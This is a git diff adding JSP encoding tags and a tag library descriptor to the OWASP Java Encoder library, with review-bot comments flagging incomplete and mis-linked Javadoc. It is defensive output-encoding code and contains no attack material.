+// HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+// STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+// ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+// OF THE POSSIBILITY OF SUCH DAMAGE.
+
+package org.owasp.encoder.tag;
+
+import java.io.IOException;
+import javax.servlet.jsp.JspException;
+import org.owasp.encoder.Encode;
+
+/**
+ * A tag to perform JavaScript Attribute encoding.
+ * This wraps the {@link org.owasp.encoder.Encode#forJavaScriptAttribute(java.lang.String)}.
+ *
+ * @author Jeremy Long (jeremy.long@gmail.com)
+ */
+public class ForJavaScriptAttributeTag extends EncodingTag {
+ @Override
+ public void doTag() throws JspException, IOException {
+ Encode.forJavaScriptAttribute(getJspContext().getOut(), _value);
+ }
+}
diff --git a/jsp/src/main/java/org/owasp/encoder/tag/ForJavaScriptBlockTag.java b/jsp/src/main/java/org/owasp/encoder/tag/ForJavaScriptBlockTag.java
new file mode 100644
index 0000000..439f963
--- /dev/null
+++ b/jsp/src/main/java/org/owasp/encoder/tag/ForJavaScriptBlockTag.java
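Review bot: The Javadoc summary `A tag to perform JavaScript Attribute encoding.` drops both constraints that this commit's TLD description attaches to this tag — the output is NOT safe inside a script block, and the page must supply the surrounding quotation characters — so a reader of the class alone cannot tell which contexts it protects. Suggested wording: `Encodes a JavaScript string for use inside an HTML script attribute such as onclick; NOT safe for script blocks. The surrounding quotation characters must be written by the page.` The sibling classes have the same gap and each should carry its own TLD restriction: ForJavaScriptBlockTag (not safe in script attributes), ForJavaScriptSourceTag (not safe in any context embedded in HTML) and ForJavaScriptTag (safe in all of those contexts, quotation characters still required). `_value` comes from EncodingTag, outside this hunk.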
@@ -0,0 +1,52 @@
+// Copyright (c) 2012 Jeff Ichnowski
+// All rights reserved.
+//
+// Redistribution and use in source and binary forms, with or without
+// modification, are permitted provided that the following conditions
+// are met:
+//
+// * Redistributions of source code must retain the above
+// copyright notice, this list of conditions and the following
+// disclaimer.
+//
+// * Redistributions in binary form must reproduce the above
+// copyright notice, this list of conditions and the following
+// disclaimer in the documentation and/or other materials
+// provided with the distribution.
+//
+// * Neither the name of the OWASP nor the names of its
+// contributors may be used to endorse or promote products
+// derived from this software without specific prior written
+// permission.
+//
+// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
+// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
+// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
+// FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
+// COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT,
+// INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
+// (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
+// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+// HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+// STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+// ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+// OF THE POSSIBILITY OF SUCH DAMAGE.
+
+package org.owasp.encoder.tag;
+
+import java.io.IOException;
+import javax.servlet.jsp.JspException;
+import org.owasp.encoder.Encode;
+
+/**
+ * A tag to perform JavaScript Block encoding.
+ * This wraps the {@link org.owasp.encoder.Encode#forJavaScriptBlock(java.lang.String)}.
+ *
+ * @author Jeremy Long (jeremy.long@gmail.com)
+ */
+public class ForJavaScriptBlockTag extends EncodingTag {
+ @Override
+ public void doTag() throws JspException, IOException {
+ Encode.forJavaScriptBlock(getJspContext().getOut(), _value);
+ }
+}
diff --git a/jsp/src/main/java/org/owasp/encoder/tag/ForJavaScriptSourceTag.java b/jsp/src/main/java/org/owasp/encoder/tag/ForJavaScriptSourceTag.java
new file mode 100644
index 0000000..4b6b3b1
--- /dev/null
+++ b/jsp/src/main/java/org/owasp/encoder/tag/ForJavaScriptSourceTag.java
@@ -0,0 +1,52 @@
+// Copyright (c) 2012 Jeff Ichnowski
+// All rights reserved.
+//
+// Redistribution and use in source and binary forms, with or without
+// modification, are permitted provided that the following conditions
+// are met:
+//
+// * Redistributions of source code must retain the above
+// copyright notice, this list of conditions and the following
+// disclaimer.
+//
+// * Redistributions in binary form must reproduce the above
+// copyright notice, this list of conditions and the following
+// disclaimer in the documentation and/or other materials
+// provided with the distribution.
+//
+// * Neither the name of the OWASP nor the names of its
+// contributors may be used to endorse or promote products
+// derived from this software without specific prior written
+// permission.
+//
+// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
+// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
+// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
+// FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
+// COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT,
+// INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
+// (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
+// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+// HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+// STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+// ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+// OF THE POSSIBILITY OF SUCH DAMAGE.
+
+package org.owasp.encoder.tag;
+
+import java.io.IOException;
+import javax.servlet.jsp.JspException;
+import org.owasp.encoder.Encode;
+
+/**
+ * A tag to perform JavaScript Source encoding.
+ * This wraps the {@link org.owasp.encoder.Encode#forJavaScriptSource(java.lang.String)}.
+ *
+ * @author Jeremy Long (jeremy.long@gmail.com)
+ */
+public class ForJavaScriptSourceTag extends EncodingTag {
+ @Override
+ public void doTag() throws JspException, IOException {
+ Encode.forJavaScriptSource(getJspContext().getOut(), _value);
+ }
+}
diff --git a/jsp/src/main/java/org/owasp/encoder/tag/ForJavaScriptTag.java b/jsp/src/main/java/org/owasp/encoder/tag/ForJavaScriptTag.java
new file mode 100644
index 0000000..c3edc17
--- /dev/null
+++ b/jsp/src/main/java/org/owasp/encoder/tag/ForJavaScriptTag.java
@@ -0,0 +1,52 @@
+// Copyright (c) 2012 Jeff Ichnowski
+// All rights reserved.
+//
+// Redistribution and use in source and binary forms, with or without
+// modification, are permitted provided that the following conditions
+// are met:
+//
+// * Redistributions of source code must retain the above
+// copyright notice, this list of conditions and the following
+// disclaimer.
+//
+// * Redistributions in binary form must reproduce the above
+// copyright notice, this list of conditions and the following
+// disclaimer in the documentation and/or other materials
+// provided with the distribution.
+//
+// * Neither the name of the OWASP nor the names of its
+// contributors may be used to endorse or promote products
+// derived from this software without specific prior written
+// permission.
+//
+// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
+// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
+// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
+// FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
+// COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT,
+// INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
+// (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
+// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+// HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+// STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+// ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+// OF THE POSSIBILITY OF SUCH DAMAGE.
+
+package org.owasp.encoder.tag;
+
+import java.io.IOException;
+import javax.servlet.jsp.JspException;
+import org.owasp.encoder.Encode;
+
+/**
+ * A tag to perform JavaScript encoding.
+ * This wraps the {@link org.owasp.encoder.Encode#forJavaScript(java.lang.String)}.
+ *
+ * @author Jeremy Long (jeremy.long@gmail.com)
+ */
+public class ForJavaScriptTag extends EncodingTag {
+ @Override
+ public void doTag() throws JspException, IOException {
+ Encode.forJavaScript(getJspContext().getOut(), _value);
+ }
+}
diff --git a/jsp/src/main/java/org/owasp/encoder/tag/ForUriComponentTag.java b/jsp/src/main/java/org/owasp/encoder/tag/ForUriComponentTag.java
new file mode 100644
index 0000000..ab1552e
--- /dev/null
+++ b/jsp/src/main/java/org/owasp/encoder/tag/ForUriComponentTag.java
@@ -0,0 +1,53 @@
+// Copyright (c) 2012 Jeff Ichnowski
+// All rights reserved.
+//
+// Redistribution and use in source and binary forms, with or without
+// modification, are permitted provided that the following conditions
+// are met:
+//
+// * Redistributions of source code must retain the above
+// copyright notice, this list of conditions and the following
+// disclaimer.
+//
+// * Redistributions in binary form must reproduce the above
+// copyright notice, this list of conditions and the following
+// disclaimer in the documentation and/or other materials
+// provided with the distribution.
+//
+// * Neither the name of the OWASP nor the names of its
+// contributors may be used to endorse or promote products
+// derived from this software without specific prior written
+// permission.
+//
+// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
+// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
+// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
+// FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
+// COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT,
+// INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
+// (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
+// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+// HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+// STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+// ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+// OF THE POSSIBILITY OF SUCH DAMAGE.
+
+package org.owasp.encoder.tag;
+
+import java.io.IOException;
+import javax.servlet.jsp.JspException;
+import org.owasp.encoder.Encode;
+
+/**
+ * A tag that performs percent-encoding for a component of a URI, such as a query
+ * parameter name or value, path, or query-string.
+ * This wraps the {@link org.owasp.encoder.Encode#forUriComponent(java.lang.String)}.
+ *
+ * @author Jeremy Long (jeremy.long@gmail.com)
+ */
+public class ForUriComponentTag extends EncodingTag {
+ @Override
+ public void doTag() throws JspException, IOException {
+ Encode.forUriComponent(getJspContext().getOut(), _value);
+ }
+}
diff --git a/jsp/src/main/java/org/owasp/encoder/tag/ForUriTag.java b/jsp/src/main/java/org/owasp/encoder/tag/ForUriTag.java
new file mode 100644
index 0000000..9b975f5
--- /dev/null
+++ b/jsp/src/main/java/org/owasp/encoder/tag/ForUriTag.java
@@ -0,0 +1,52 @@
+// Copyright (c) 2012 Jeff Ichnowski
+// All rights reserved.
+//
+// Redistribution and use in source and binary forms, with or without
+// modification, are permitted provided that the following conditions
+// are met:
+//
+// * Redistributions of source code must retain the above
+// copyright notice, this list of conditions and the following
+// disclaimer.
+//
+// * Redistributions in binary form must reproduce the above
+// copyright notice, this list of conditions and the following
+// disclaimer in the documentation and/or other materials
+// provided with the distribution.
+//
+// * Neither the name of the OWASP nor the names of its
+// contributors may be used to endorse or promote products
+// derived from this software without specific prior written
+// permission.
+//
+// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
+// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
+// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
+// FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
+// COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT,
+// INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
+// (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
+// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+// HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+// STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+// ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+// OF THE POSSIBILITY OF SUCH DAMAGE.
+
+package org.owasp.encoder.tag;
+
+import java.io.IOException;
+import javax.servlet.jsp.JspException;
+import org.owasp.encoder.Encode;
+
+/**
+ * A tag to perform percent-encoding of a URL according to RFC 3986.
+ * This wraps the {@link org.owasp.encoder.Encode#forUri(java.lang.String)}.
+ *
+ * @author Jeremy Long (jeremy.long@gmail.com)
+ */
+public class ForUriTag extends EncodingTag {
+ @Override
+ public void doTag() throws JspException, IOException {
+ Encode.forUri(getJspContext().getOut(), _value);
+ }
+}
diff --git a/jsp/src/main/java/org/owasp/encoder/tag/ForXmlAttributeTag.java b/jsp/src/main/java/org/owasp/encoder/tag/ForXmlAttributeTag.java
new file mode 100644
index 0000000..e2820d9
--- /dev/null
+++ b/jsp/src/main/java/org/owasp/encoder/tag/ForXmlAttributeTag.java
@@ -0,0 +1,52 @@
+// Copyright (c) 2012 Jeff Ichnowski
+// All rights reserved.
+//
+// Redistribution and use in source and binary forms, with or without
+// modification, are permitted provided that the following conditions
+// are met:
+//
+// * Redistributions of source code must retain the above
+// copyright notice, this list of conditions and the following
+// disclaimer.
+//
+// * Redistributions in binary form must reproduce the above
+// copyright notice, this list of conditions and the following
+// disclaimer in the documentation and/or other materials
+// provided with the distribution.
+//
+// * Neither the name of the OWASP nor the names of its
+// contributors may be used to endorse or promote products
+// derived from this software without specific prior written
+// permission.
+//
+// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
+// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
+// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
+// FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
+// COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT,
+// INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
+// (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
+// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+// HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+// STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+// ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+// OF THE POSSIBILITY OF SUCH DAMAGE.
+
+package org.owasp.encoder.tag;
+
+import java.io.IOException;
+import javax.servlet.jsp.JspException;
+import org.owasp.encoder.Encode;
+
+/**
+ * A tag to perform XML Attribute Encoding.
+ * This wraps the {@link org.owasp.encoder.Encode#forXmlAttribute(java.lang.String)}.
+ *
+ * @author Jeremy Long (jeremy.long@gmail.com)
+ */
+public class ForXmlAttributeTag extends EncodingTag {
+ @Override
+ public void doTag() throws JspException, IOException {
+ Encode.forXmlAttribute(getJspContext().getOut(), _value);
+ }
+}
diff --git a/jsp/src/main/java/org/owasp/encoder/tag/ForXmlCommentTag.java b/jsp/src/main/java/org/owasp/encoder/tag/ForXmlCommentTag.java
new file mode 100644
index 0000000..fd3e0d5
--- /dev/null
+++ b/jsp/src/main/java/org/owasp/encoder/tag/ForXmlCommentTag.java
@@ -0,0 +1,52 @@
+// Copyright (c) 2012 Jeff Ichnowski
+// All rights reserved.
+//
+// Redistribution and use in source and binary forms, with or without
+// modification, are permitted provided that the following conditions
+// are met:
+//
+// * Redistributions of source code must retain the above
+// copyright notice, this list of conditions and the following
+// disclaimer.
+//
+// * Redistributions in binary form must reproduce the above
+// copyright notice, this list of conditions and the following
+// disclaimer in the documentation and/or other materials
+// provided with the distribution.
+//
+// * Neither the name of the OWASP nor the names of its
+// contributors may be used to endorse or promote products
+// derived from this software without specific prior written
+// permission.
+//
+// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
+// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
+// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
+// FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
+// COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT,
+// INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
+// (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
+// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+// HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+// STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+// ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+// OF THE POSSIBILITY OF SUCH DAMAGE.
+
+package org.owasp.encoder.tag;
+
+import java.io.IOException;
+import javax.servlet.jsp.JspException;
+import org.owasp.encoder.Encode;
+
+/**
+ * A tag to perform XML Comment Encoding.
+ * This wraps the {@link org.owasp.encoder.Encode#forXmlAttribute(java.lang.String)}.
+ *
+ * @author Jeremy Long (jeremy.long@gmail.com)
+ */
+public class ForXmlCommentTag extends EncodingTag {
+ @Override
+ public void doTag() throws JspException, IOException {
+ Encode.forXmlComment(getJspContext().getOut(), _value);
+ }
+}
diff --git a/jsp/src/main/java/org/owasp/encoder/tag/ForXmlContentTag.java b/jsp/src/main/java/org/owasp/encoder/tag/ForXmlContentTag.java
new file mode 100644
index 0000000..c5540ef
--- /dev/null
+++ b/jsp/src/main/java/org/owasp/encoder/tag/ForXmlContentTag.java
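Review bot: The Javadoc link names `Encode#forXmlAttribute(java.lang.String)` but `doTag()` calls `Encode.forXmlComment`, so the generated documentation sends readers to a different encoder with different escaping rules than the one this tag applies; change it to `{@link org.owasp.encoder.Encode#forXmlComment(java.io.Writer, java.lang.String)}`. ForXmlContentTag in this commit has the same copy-paste error — its link also names forXmlAttribute while the body calls forXmlContent — and should link `forXmlContent`. A one-line statement of the context this tag is for (the text inside an XML comment, with the `<!--` and `-->` delimiters written by the page) would also help, since the summary line only repeats the class name.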
@@ -0,0 +1,52 @@
+// Copyright (c) 2012 Jeff Ichnowski
+// All rights reserved.
+//
+// Redistribution and use in source and binary forms, with or without
+// modification, are permitted provided that the following conditions
+// are met:
+//
+// * Redistributions of source code must retain the above
+// copyright notice, this list of conditions and the following
+// disclaimer.
+//
+// * Redistributions in binary form must reproduce the above
+// copyright notice, this list of conditions and the following
+// disclaimer in the documentation and/or other materials
+// provided with the distribution.
+//
+// * Neither the name of the OWASP nor the names of its
+// contributors may be used to endorse or promote products
+// derived from this software without specific prior written
+// permission.
+//
+// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
+// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
+// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
+// FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
+// COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT,
+// INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
+// (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
+// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+// HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+// STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+// ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+// OF THE POSSIBILITY OF SUCH DAMAGE.
+
+package org.owasp.encoder.tag;
+
+import java.io.IOException;
+import javax.servlet.jsp.JspException;
+import org.owasp.encoder.Encode;
+
+/**
+ * A tag to perform XML Content Encoding.
+ * This wraps the {@link org.owasp.encoder.Encode#forXmlAttribute(java.lang.String)}.
+ *
+ * @author Jeremy Long (jeremy.long@gmail.com)
+ */
+public class ForXmlContentTag extends EncodingTag {
+ @Override
+ public void doTag() throws JspException, IOException {
+ Encode.forXmlContent(getJspContext().getOut(), _value);
+ }
+}
diff --git a/jsp/src/main/java/org/owasp/encoder/tag/ForXmlTag.java b/jsp/src/main/java/org/owasp/encoder/tag/ForXmlTag.java
new file mode 100644
index 0000000..ea9ebea
--- /dev/null
+++ b/jsp/src/main/java/org/owasp/encoder/tag/ForXmlTag.java
@@ -0,0 +1,52 @@
+// Copyright (c) 2012 Jeff Ichnowski
+// All rights reserved.
+//
+// Redistribution and use in source and binary forms, with or without
+// modification, are permitted provided that the following conditions
+// are met:
+//
+// * Redistributions of source code must retain the above
+// copyright notice, this list of conditions and the following
+// disclaimer.
+//
+// * Redistributions in binary form must reproduce the above
+// copyright notice, this list of conditions and the following
+// disclaimer in the documentation and/or other materials
+// provided with the distribution.
+//
+// * Neither the name of the OWASP nor the names of its
+// contributors may be used to endorse or promote products
+// derived from this software without specific prior written
+// permission.
+//
+// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
+// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
+// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
+// FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
+// COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT,
+// INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
+// (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
+// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+// HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+// STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+// ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+// OF THE POSSIBILITY OF SUCH DAMAGE.
+
+package org.owasp.encoder.tag;
+
+import java.io.IOException;
+import javax.servlet.jsp.JspException;
+import org.owasp.encoder.Encode;
+
+/**
+ * A tag to perform XML Encoding.
+ * This wraps the {@link org.owasp.encoder.Encode#forXml(java.lang.String)}.
+ *
+ * @author Jeremy Long (jeremy.long@gmail.com)
+ */
+public class ForXmlTag extends EncodingTag {
+ @Override
+ public void doTag() throws JspException, IOException {
+ Encode.forXml(getJspContext().getOut(), _value);
+ }
+}
diff --git a/jsp/src/main/resources/META-INF/LICENSE b/jsp/src/main/resources/META-INF/LICENSE
new file mode 100644
index 0000000..f66c375
--- /dev/null
+++ b/jsp/src/main/resources/META-INF/LICENSE
@@ -0,0 +1,33 @@
+Copyright (c) 2015 Jeff Ichnowski
+All rights reserved.
+
+Redistribution and use in source and binary forms, with or without
+modification, are permitted provided that the following conditions
+are met:
+
+ * Redistributions of source code must retain the above
+ copyright notice, this list of conditions and the following
+ disclaimer.
+
+ * Redistributions in binary form must reproduce the above
+ copyright notice, this list of conditions and the following
+ disclaimer in the documentation and/or other materials
+ provided with the distribution.
+
+ * Neither the name of the OWASP nor the names of its
+ contributors may be used to endorse or promote products
+ derived from this software without specific prior written
+ permission.
+
+THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
+"AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
+LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
+FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
+COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT,
+INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
+(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
+SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+OF THE POSSIBILITY OF SUCH DAMAGE.
\ No newline at end of file
diff --git a/jsp/src/main/resources/META-INF/java-encoder-advanced.tld b/jsp/src/main/resources/META-INF/java-encoder-advanced.tld
new file mode 100644
index 0000000..becab48
--- /dev/null
+++ b/jsp/src/main/resources/META-INF/java-encoder-advanced.tld
@@ -0,0 +1,560 @@ + + + OWASP Java Encoder Project + 1.0 + java-encoder + https://www.owasp.org/index.php/OWASP_Java_Encoder_Project#advanced + + + Encodes data for an XML CDATA section. On the chance that the input + contains a terminating + "]]&gt;", it will be replaced by + &quot;]]&gt;]]&lt;![CDATA[&gt;&quot;. + As with all XML contexts, characters that are invalid according to the + XML specification will be replaced by a space character. Caller must + provide the CDATA section boundaries. + + forCDATA + forCDATA + org.owasp.encoder.tag.ForCDATATag + empty + + The value to be written out + value + true + true + java.lang.String + + + + + This method encodes for HTML text content. It does not escape + quotation characters and is thus unsafe for use with + HTML attributes. Use either forHtml or forHtmlAttribute for those + methods. + + forHtmlContent + forHtmlContent + org.owasp.encoder.tag.ForHtmlContentTag + empty + + value to be written out + value + true + true + java.lang.String + + + + Encodes for XML and XHTML attribute content. + forXmlAttribute + forXmlAttribute + org.owasp.encoder.tag.ForXmlAttributeTag + empty + + value to be written out + value + true + true + java.lang.String + + + + Encodes for XML and XHTML. + forXml + forXml + org.owasp.encoder.tag.ForXmlTag + empty + + value to be written out + value + true + true + java.lang.String + + + + + Encodes for a JavaScript string. It is safe for use in HTML + script attributes (such as onclick), script + blocks, JSON files, and JavaScript source. The caller MUST + provide the surrounding quotation characters for the string. + Since this performs additional encoding so it can work in all + of the JavaScript contexts listed, it may be slightly less + efficient then using one of the methods targetted to a specific + JavaScript context: forJavaScriptAttribute, + forJavaScriptBlock, or forJavaScriptSource. 
+ + Unless you are interested in saving a few bytes of output or + are writing a framework on top of this library, it is recommend + that you use this method over the others. + + forJavaScript + forJavaScript + org.owasp.encoder.tag.ForJavaScriptTag + empty + + value to be written out + value + true + true + java.lang.String + + + + + This method encodes for JavaScript strings contained within + HTML script attributes (such as onclick). It is + NOT safe for use in script blocks. The caller MUST provide the + surrounding quotation characters. This method performs the + same encode as Encode.forJavaScript(String) with the + exception that / is not escaped. + + forJavaScriptAttribute + forJavaScriptAttribute + org.owasp.encoder.tag.ForJavaScriptAttributeTag + empty + + value to be written out + value + true + true + java.lang.String + + + + + This method encodes for JavaScript strings contained within + HTML script blocks. It is NOT safe for use in script + attributes (such as onclick). The caller must + provide the surrounding quotation characters. This method + performs the same encode as Encode.forJavaScript(String)} with + the exception that " and ' are encoded as \" and \' respectively. + + forJavaScriptBlock + forJavaScriptBlock + org.owasp.encoder.tag.ForJavaScriptBlockTag + empty + + value to be written out + value + true + true + java.lang.String + + + + + This method encodes for JavaScript strings contained within + a JavaScript or JSON file. This method is NOT safe for + use in ANY context embedded in HTML. The caller must + provide the surrounding quotation characters. This method + performs the same encode as Encode.forJavaScript(String) with + the exception that / and & are not escaped and " and ' are + encoded as \" and \' respectively. 
+ + forJavaScriptSource + forJavaScriptSource + org.owasp.encoder.tag.ForJavaScriptSourceTag + empty + + value to be written out + value + true + true + java.lang.String + + + + + Encodes for unquoted HTML attribute values. forHtml(String) or + forHtmlAttribute(String) should usually be preferred over this + method as quoted attributes are XHTML compliant. + + forHtmlUnquotedAttribute + forHtmlUnquotedAttribute + org.owasp.encoder.tag.ForHtmlUnquotedAttributeTag + empty + + value to be written out + value + true + true + java.lang.String + + + + + Performs percent-encoding of a URL according to RFC 3986. The provided + URL is assumed to a valid URL. This method does not do any checking on + the quality or safety of the URL itself. In many applications it may + be better to use java.net.URI instead. Note: this is a + particularly dangerous context to put untrusted content in, as for + example a "javascript:" URL provided by a malicious user would be + "properly" escaped, and still execute. + + forUri + forUri + 